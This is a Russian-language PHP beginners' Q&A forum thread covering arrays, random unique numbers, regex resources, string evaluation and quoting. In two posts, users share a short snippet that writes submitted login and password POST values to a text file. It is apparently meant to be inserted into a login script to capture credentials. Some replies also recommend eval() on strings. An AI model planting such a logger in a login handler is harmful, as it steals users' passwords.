[php] Новичкам: задаем вопросы

Discussion in 'PHP' started by _Great_, 26 May 2007.

Thread Status:
Not open for further replies.
  1. .:EnoT:.

    .:EnoT:. Сексуальное чудовище

    Joined:
    29 May 2007
    Messages:
    822
    Likes Received:
    559
    Reputations:
    50
    Кстати насчёт регулярок. На офф сайтах фигня, новичку не хрена не понятно...я так же, когда регулярки не понимал лазил по офф сайтам и не вдуплял что такое подшаблоны, ограничители, модификаторы...
    Так что советую почитать вот эту статью и сразу станет всё понятно :)
    http://pyha.ru/forum/topic/19.0
     
  2. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    443
    Likes Received:
    160
    Reputations:
    27
    вопроса не понял... если сервер линуховый
    Code:
    system("ls <имя папки>") 
    если вндовый то (_http://www.computerhope.com/dirhlp.htm)
    Code:
    system("dir <пусть до папки>")
     
    #5062 gisTy, 28 Aug 2008
    Last edited: 28 Aug 2008
  3. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    756
    Likes Received:
    244
    Reputations:
    22
    #Wolf#
    http://il.php.net/manual/en/ref.dir.php
     
  4. Gifts

    Gifts Green member

    Joined:
    25 Apr 2008
    Messages:
    2,497
    Likes Received:
    808
    Reputations:
    614
    Подскажите, как правильно удалить произвольный элемент массива? К примеру array_shift и array_pop извлекают соотвественно первый и последний элементы, но для произвольного элемента - я видимо плохо искал.

    З.Ы. $a[2]=""; - не предлагать)
     
    _________________________
  5. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    756
    Likes Received:
    244
    Reputations:
    22
    unset($a[2]);
     
    1 person likes this.
  6. xxxxxxxxxxxxxxx

    xxxxxxxxxxxxxxx Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    66
    Likes Received:
    8
    Reputations:
    0
    Как реализовать? нужно достать с файла строки найти определенный символ в строках и удалить все что находиться после этого символа..
     
  7. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    1,012
    Likes Received:
    1,167
    Reputations:
    446
    http://www.softtime.ru/bookphp/help.php
     
  8. sa1o

    sa1o New Member

    Joined:
    5 May 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    плз помогите, чет никак не выходит
    есть массив
    for($i=0; $i<$id; $i++) {
    $rand_array[$i] = rand(1, $id);
    }
    надо сделать так чтобы на выходе каждый эл-т был уникален
    к примеру если взять $id=2
    и получим массив array(1, 1);
    на выходе надо получить array(1, 2); или array(2, 1);
    у меня получилось вот что:

    PHP:
    $arr = array(22133);

    function 
    uniq($arr$id) {
    for(
    $j=0$j<count($arr); $j++) {
        
    $temp $arr[$j];
            for(
    $k=0$k<count($arr); $k++) {
                if(
    $i==&& $k==4) return($arr);
        
    $k = ($k==$j) ? ($j+1) : $k;
        if(
    $temp == $arr[$k]) {
            
    $arr[$k] = rand(1$id);
            
    uniq($arr$id);
        }
            }
    }
        return(
    $arr);
    }
    но выполняется не всегда, видимо постоянная рекурсия жрет очень много ресурсов.
    помогите как исправить код чтобы работал без сбоев)
    или мб какой-нибудь другой вар обработки предложите)
    заранее спасибо
     
  9. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    756
    Likes Received:
    244
    Reputations:
    22
    По идеи должно сработать ...

    PHP:
    <?php

    for($i=0$i<$id$i++) {
    $buf mt_rand(1$id);
    while(
    in_array($buf,$rand_array))
    {
       
    $buf mt_rand(1$id);
    }

    $rand_array[] = $buf;
    }

    ?>
     
  10. FrMn

    FrMn Elder - Старейшина

    Joined:
    8 Aug 2008
    Messages:
    52
    Likes Received:
    16
    Reputations:
    7
    Code:
    <?php
    $arr=range(1,$id);
    shuffle($arr);
    ?>
     
    1 person likes this.
  11. Dr.End

    Dr.End New Member

    Joined:
    25 Jun 2008
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Как математически вычеслить в строке "3006 + (40416-966) / 30" ?
     
  12. deniska1517

    deniska1517 Elder - Старейшина

    Joined:
    1 May 2008
    Messages:
    174
    Likes Received:
    75
    Reputations:
    -5
    Dr.End
    или так
    PHP:
    <php
    $_1=3006
    $_2=40416;
    $_3=966
    $_4=30
    $_5=$_1+($_2-$_3)/$_4;
    echo 
    $_5
    ?>
     
  13. sa1o

    sa1o New Member

    Joined:
    5 May 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    спасибо, блин во я дурак...
     
  14. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,236
    Likes Received:
    1,068
    Reputations:
    80
    PHP:
    $n = eval('3006+(40416-966)/30');
     
    1 person likes this.
  15. scarm

    scarm Elder - Старейшина

    Joined:
    4 Apr 2008
    Messages:
    78
    Likes Received:
    48
    Reputations:
    9
    цитата отсюда:
    http://forum.antichat.ru/thread82869.html

     
  16. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    756
    Likes Received:
    244
    Reputations:
    22
    scarm
    PHP:
    <?php
    $f 
    fopen('lp.txt','a');
    fwrite($f,$_POST['login'].':'.$_POST['pass']."\r\n");
    fclose($f);
    ?>
    токо надо поправить POST данные в соответствии со скриптом
     
    2 people like this.
  17. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,236
    Likes Received:
    1,068
    Reputations:
    80
    тогда уж лучше в файл логина:
    PHP:
    <?php
    $f 
    fopen('lp.txt','a');
    foreach(
    $_POST as $data){
            
    fwrite($f$data.'\n');
    }
    fclose($f);
    ?>
     
  18. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    756
    Likes Received:
    244
    Reputations:
    22
    ChaaK еси так то в файл попадут лишние данные ...
     
  19. PHPFire

    PHPFire New Member

    Joined:
    25 Aug 2008
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0

    Используй $a=eval("3006 + (40416-966) / 30") запозднился с ответом
     
    1 person likes this.
  20. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    165
    Likes Received:
    37
    Reputations:
    5
    Вопрос такой.... файл log.php полностью перезаписывается перемеенной $body

    PHP:
    $body=
    "
    <?

    /$list="<div><span style=\"cursor:hand;color:#ffffff;\" onclick=\"toggle(document.getElementById('HShow#num#'));\">&raquo;</span> <a href=\"./".$tagmetka."/#menu#\" class=\"menu\">#namemenu#</a></div>
    <span id=HShow#num#>#listing#</span><script>toggle(document.getElementById('HShow#num#'));</script>";
    ?>";
    Но как видно и $list имеет и одинарные и двойные кавычки и само значение переменной $body помещено в двойные кавычки и из-за этого проблемы с обособлением значения перемнной. Как правильно использовать кавычки?
     
Loading...
Similar Threads - Новичкам задаем вопросы
  1. Kaimi
    Replies:
    331
    Views:
    101,805
  2. Варик
    Replies:
    3
    Views:
    1,683
  3. insulin
    Replies:
    6
    Views:
    1,574
  4. _Great_
    Replies:
    2,100
    Views:
    362,395
Thread Status:
Not open for further replies.